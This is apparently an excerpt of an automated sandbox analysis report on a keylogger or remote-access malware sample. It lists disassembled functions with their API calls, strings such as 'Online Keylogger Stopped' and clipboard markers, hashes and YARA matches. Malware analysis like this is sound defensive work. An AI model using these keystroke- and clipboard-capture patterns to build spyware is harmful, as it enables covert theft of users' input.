                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Are you sure you want to un-install the PunkBuster Service?$Un-Install PunkBuster Service
                                              • API String ID: 3519838083-2198055661
                                              • Opcode ID: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction ID: 3f86f169e8ea4f34bfe8433b3b75cf2069d93a569d5023850833cb461211cf54
                                              • Opcode Fuzzy Hash: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction Fuzzy Hash: 0831BF71C002899ECB00DF69C888BEDBBB4AB16314F5481BED455773E2C7385A08CB55
                                              Function 001108DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00110B39,?,00000050,?,?,?,?,?), ref: 001109B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ACP$OCP
                                              • API String ID: 0-711371036
                                              • Opcode ID: a6c60df0ebe5c9b9d12d6dd1c12ed8721708bb5612d82b05af4e4429a5956fcd
                                              • Instruction ID: 83fcabeaacab525f02d941b5e658e74d0913e0a711645eaf57f9ceeb1c05d857
                                              • Opcode Fuzzy Hash: a6c60df0ebe5c9b9d12d6dd1c12ed8721708bb5612d82b05af4e4429a5956fcd
                                              • Instruction Fuzzy Hash: 62212462E04209A6F73E8B548920BD773AAAB5CB28F564434E94DD7202F7B2DDC0C350
                                              Function 000CAE58 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000F3519: EnterCriticalSection.KERNEL32(00130D18,?,00135D2C,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3524
                                                • Part of subcall function 000F3519: LeaveCriticalSection.KERNEL32(00130D18,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3561
                                                • Part of subcall function 000F38A5: __onexit.LIBCMT ref: 000F38AB
                                              • __Init_thread_footer.LIBCMT ref: 000CAEA7
                                                • Part of subcall function 000F34CF: EnterCriticalSection.KERNEL32(00130D18,00135D2C,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F34D9
                                                • Part of subcall function 000F34CF: LeaveCriticalSection.KERNEL32(00130D18,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F350C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                              • API String ID: 2974294136-3686566968
                                              • Opcode ID: 384a49daf9bafd927ba9db88ed499d8d775ade4668b4f004acc3f83c4f5d1fdf
                                              • Instruction ID: dabfe7460204875a4d252fd8405db8fb010e578308710fe1a46aa4fe602aeea6
                                              • Opcode Fuzzy Hash: 384a49daf9bafd927ba9db88ed499d8d775ade4668b4f004acc3f83c4f5d1fdf
                                              • Instruction Fuzzy Hash: D6218032A0021D9ACB14FBA4D892FED7775AF52724F50403DF502A7193EF306E4A8A91
                                              Function 0043B020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStockObject.GDI32 ref: 0043B068
                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043B07E
                                                • Part of subcall function 00498F70: GetVersionExA.KERNEL32 ref: 00498F97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$StockVersion
                                              • String ID: MS Shell Dlg 2
                                              • API String ID: 3343268070-3198668166
                                              • Opcode ID: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction ID: e155e28d74422bf90b24fc72c595fcbdcfc2968bb2b625db651e1d297fa305ef
                                              • Opcode Fuzzy Hash: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction Fuzzy Hash: 5A318E745083819FD724CF25C884B5BBBF0FBC8704F00892EE9A587392E7789548CB9A
                                              Function 000C49BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?,00133EE8,001345A8,?,?,?,?,?,?,?,000D4D7D,?,00000001,0000004C,00000000), ref: 000C49F1
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • GetLocalTime.KERNEL32(?,00133EE8,001345A8,?,?,?,?,?,?,?,000D4D7D,?,00000001,0000004C,00000000), ref: 000C4A4E
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 000C49E5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 481472006-1507639952
                                              • Opcode ID: 1a14310bb0277f57a1b377b4ebd0d144e9ac197432efee66795068e9f3876a15
                                              • Instruction ID: 8112e2be128ebf4c5cdd9aa7bf704f7e40df246bdb6ab0be0fa2b62bb6325dd9
                                              • Opcode Fuzzy Hash: 1a14310bb0277f57a1b377b4ebd0d144e9ac197432efee66795068e9f3876a15
                                              • Instruction Fuzzy Hash: 742138B1A042906BC354FB789C17BDE7BD56B93315F44400DF801476A3DB306589C7A7
                                              Function 004063FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Message$get_FirewallEnabled failed: 0x%08lx
                                              • API String ID: 3519838083-3669246561
                                              • Opcode ID: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction ID: f105753d09791b4c671eee8698da4191506a5d5f18efc9bd2aac6efeec02826c
                                              • Opcode Fuzzy Hash: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction Fuzzy Hash: B911E671600108FFCB00EFA9C881ADE77A5AF48314F10827EF55AE71D1D7749A44C754
                                              Function 000DA686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: | $%02i:%02i:%02i:%03i
                                              • API String ID: 481472006-2430845779
                                              • Opcode ID: 036292ce99a2c348d45a0d81ea6d99fbed21cc4db180d86682c4e51350edb735
                                              • Instruction ID: 75c687e05f4a9e6d35437e40c668dba121b997e545407c19b33833bd2aa0b984
                                              • Opcode Fuzzy Hash: 036292ce99a2c348d45a0d81ea6d99fbed21cc4db180d86682c4e51350edb735
                                              • Instruction Fuzzy Hash: F5111C725082545AC708EBA4D896EEE73E8AF96700F50052EF895C2293EF34DA84C656
                                              Function 000CA767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000CA876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                                • Part of subcall function 000CA876: wsprintfW.USER32 ref: 000CA905
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • CloseHandle.KERNEL32(?), ref: 000CA7CA
                                              • UnhookWindowsHookEx.USER32 ref: 000CA7DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                              • String ID: Online Keylogger Stopped
                                              • API String ID: 1623830855-1496645233
                                              • Opcode ID: 34feed64bfb51223130a6be62de0a2430620acd01eacba0a37c1601205d73839
                                              • Instruction ID: 95b8b08662252aee162a2668348f7f9d19bf8ce55a53da2ba9a0a51f2ebb6a99
                                              • Opcode Fuzzy Hash: 34feed64bfb51223130a6be62de0a2430620acd01eacba0a37c1601205d73839
                                              • Instruction Fuzzy Hash: 8E01D431B082159BDB257734CC0BBEDBBB56B43314F80015DF44112693EBA15996C3D3
                                              Function 00409D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Do you really want to cancel?$Question
                                              • API String ID: 3519838083-3547955172
                                              • Opcode ID: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction ID: bd53129a67d079509a4369cd051eac07b3f348f5042458483638bc8e6ad9a035
                                              • Opcode Fuzzy Hash: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction Fuzzy Hash: 3401B531C00199ABCB10E795C942FEEBB749F11324F60425BE461721D2D7781B48C695
                                              Function 000CAD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyState.USER32(00000011), ref: 000CAD5B
                                                • Part of subcall function 000C9B10: GetForegroundWindow.USER32(?,?,001340F8), ref: 000C9B3F
                                                • Part of subcall function 000C9B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 000C9B4B
                                                • Part of subcall function 000C9B10: GetKeyboardLayout.USER32(00000000), ref: 000C9B52
                                                • Part of subcall function 000C9B10: GetKeyState.USER32(00000010), ref: 000C9B5C
                                                • Part of subcall function 000C9B10: GetKeyboardState.USER32(?,?,001340F8), ref: 000C9B67
                                                • Part of subcall function 000C9B10: ToUnicodeEx.USER32(0013414C,?,?,?,00000010,00000000,00000000), ref: 000C9B8A
                                                • Part of subcall function 000C9B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 000C9BE3
                                                • Part of subcall function 000C9D58: SetEvent.KERNEL32(?,?,00000000,000CA91C,00000000), ref: 000C9D84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                              • String ID: [AltL]$[AltR]
                                              • API String ID: 2738857842-2658077756
                                              • Opcode ID: c7444bfa16d0883874e16c3a158eb9badf7506e384d93b341f5f64a395f63584
                                              • Instruction ID: 5668e368085fd54c7bc5f1949972a484dd3bff56cdf675846b8aa32b6cf15195
                                              • Opcode Fuzzy Hash: c7444bfa16d0883874e16c3a158eb9badf7506e384d93b341f5f64a395f63584
                                              • Instruction Fuzzy Hash: 9FE09B2134062917C998337DAA2FFFD39629B43B65B80014DF4435BAD7DE554D5153C3
                                              Function 00407D83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • your program, xrefs: 00407D8F
                                              • 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6), xrefs: 00407D94
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6)$your program
                                              • API String ID: 3519838083-1349685460
                                              • Opcode ID: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction ID: 1523a34304f5ca219838624e3a2edcca56625a63025bcd44c9342f38124bf159
                                              • Opcode Fuzzy Hash: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction Fuzzy Hash: C6E09270E505699ACB10AFA54C427DE7AA09B04748F10453FE051E72C1DBBC594087ED
                                              Function 000CADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyState.USER32(00000012), ref: 000CADB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State
                                              • String ID: [CtrlL]$[CtrlR]
                                              • API String ID: 1649606143-2446555240
                                              • Opcode ID: a2e8998703f2a4651b6acd06749e8b6f78c31a2dbf6eff5dca6054e2df74df2a
                                              • Instruction ID: 1c5559284e9e250df2a8b619f2b562c186e52610be755d909706936a07287864
                                              • Opcode Fuzzy Hash: a2e8998703f2a4651b6acd06749e8b6f78c31a2dbf6eff5dca6054e2df74df2a
                                              • Instruction Fuzzy Hash: 9EE086317007291BC56837BDDA1EFBD29619B43767F80010CF8534BDD6DA55495013D3
                                              Function 000D1699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ObjectProcessSingleTerminateWait
                                              • String ID: pth_unenc
                                              • API String ID: 1872346434-4028850238
                                              • Opcode ID: 9b9e7f5e1b40906d7cfc34f11a4715e5e60031f7a0680760659966f4d1a16e86
                                              • Instruction ID: e01706d13d1565dd4abe70dc383fa81fac9562493bca3bb6b0249cc33d6045a9
                                              • Opcode Fuzzy Hash: 9b9e7f5e1b40906d7cfc34f11a4715e5e60031f7a0680760659966f4d1a16e86
                                              • Instruction Fuzzy Hash: 2AD0C93A589111AFE7454BE4AC0CB853A79A706231F108206F82141BF0CB7544E5AA14
                                              Function 000FFA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,000C1AD8), ref: 000FFAF4
                                              • GetLastError.KERNEL32 ref: 000FFB02
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000FFB5D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: caad996117b35812e7a38f9e0e5d180d961986ea02ca0c77b65ebf8294b57bb8
                                              • Instruction ID: 7c00edbd55139c995f5c9d0d916f330ca86da34ebe2e4027175e31a4ecd06a19
                                              • Opcode Fuzzy Hash: caad996117b35812e7a38f9e0e5d180d961986ea02ca0c77b65ebf8294b57bb8
                                              • Instruction Fuzzy Hash: 7241023160024BAFCF258F64C854ABEBBF5EF41320F1441B9FA599B6A1DB708C01EB51